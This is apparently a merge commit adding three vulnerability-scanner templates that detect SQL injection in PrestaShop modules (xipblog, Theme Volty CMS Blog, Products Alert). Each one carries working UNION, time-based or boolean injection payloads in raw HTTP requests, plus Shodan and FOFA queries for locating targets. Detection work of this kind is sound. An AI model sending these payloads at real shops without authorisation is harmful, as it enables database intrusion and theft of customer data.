Merge pull request #10739 from mastercho/three-presta-cve

Added 3 Presta CVEs
2024-09-20 23:19:49 +05:30 · 2024-09-20 23:19:49 +05:30 · 3830390fe6
parent b2a1ecd9cc f42e20e723
commit 3830390fe6
3 changed files with 202 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-27847.yaml
+++ b/http/cves/2023/CVE-2023-27847.yaml
@ -0,0 +1,69 @@
+id: CVE-2023-27847
+
+info:
+  name: PrestaShop xipblog - SQL Injection
+  author: mastercho
+  severity: critical
+  description: |
+    In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
+  reference:
+    - https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-27847
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-27847
+    cwe-id: CWE-89
+    epss-score: 0.04685
+    epss-percentile: 0.91818
+  metadata:
+    verified: true
+    max-request: 2
+    framework: prestashop
+    shodan-query: html:"/xipblog"
+    fofa-query: app="Prestashop"
+  tags: cve,cve2023,prestashop,sqli,xipblog
+
+flow: http(1) && http(2)
+
+variables:
+  num: "999999999"
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_any(tolower(response), "prestashop", "xipblog")'
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 20s
+        GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        @timeout: 20s
+        GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(6)))AuDU)--+lafl HTTP/1.1
+        Host: {{Hostname}}
+
+    stop-at-first-match: true
+    host-redirects: true
+    matchers:
+      - type: word
+        name: union-based
+        part: body_1
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: dsl
+        name: time-based
+        dsl:
+          - 'duration_2>=6'
--- a/http/cves/2023/CVE-2023-39650.yaml
+++ b/http/cves/2023/CVE-2023-39650.yaml
@ -0,0 +1,62 @@
+id: CVE-2023-39650
+
+info:
+  name: PrestaShop Theme Volty CMS Blog - SQL Injection
+  author: mastercho
+  severity: critical
+  description: |
+    In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
+  reference:
+    - https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-39650
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-39650
+    cwe-id: CWE-89
+    epss-score: 0.04685
+    epss-percentile: 0.91818
+  metadata:
+    max-request: 1
+    verified: true
+    framework: prestashop
+    shodan-query: html:"/tvcmsblog"
+  tags: cve,cve2023,prestashop,sqli,tvcmsblog
+
+http:
+  - raw:
+      - |
+        @timeout: 20s
+        GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+
+      - |
+        @timeout: 20s
+        GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+
+      - |
+        @timeout: 20s
+        GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+
+    host-redirects: true
+    matchers:
+      - type: dsl
+        name: time-based
+        dsl:
+          - 'duration_1>=5'
+          - 'status_code_1 == 200 && contains(body_1, "tvcmsblog")'
+        condition: and
+
+      - type: dsl
+        name: blind-based
+        dsl:
+          - 'status_code_2 == 200 && contains(body_2, "tvcmsblog")'
+          - 'status_code_2 == 200 && status_code_3 == 302'
+        condition: and
--- a/http/cves/2024/CVE-2024-36683.yaml
+++ b/http/cves/2024/CVE-2024-36683.yaml
@ -0,0 +1,71 @@
+id: CVE-2024-36683
+
+info:
+  name: PrestaShop productsalert - SQL Injection
+  author: mastercho
+  severity: critical
+  description: |
+    In the module 'Products Alert' (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
+  reference:
+    - https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-36683
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-36683
+    cwe-id: CWE-89
+    epss-score: 0.04685
+    epss-percentile: 0.91818
+  metadata:
+    verified: true
+    max-request: 2
+    framework: prestashop
+    shodan-query: html:"/productsalert"
+    fofa-query: body="/productsalert"
+  tags: cve,cve2023,prestashop,sqli,productsalert
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    max-redirects: 3
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(tolower(body), "productsalert", "prestashop")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 30s
+        POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158
+
+      - |
+        @timeout: 30s
+        POST /module/productsalert/AjaxProcess HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pid=13158
+
+    stop-at-first-match: true
+    host-redirects: true
+    matchers:
+      - type: dsl
+        name: time-based
+        dsl:
+          - 'duration_1>=5'
+          - 'duration_2>=5'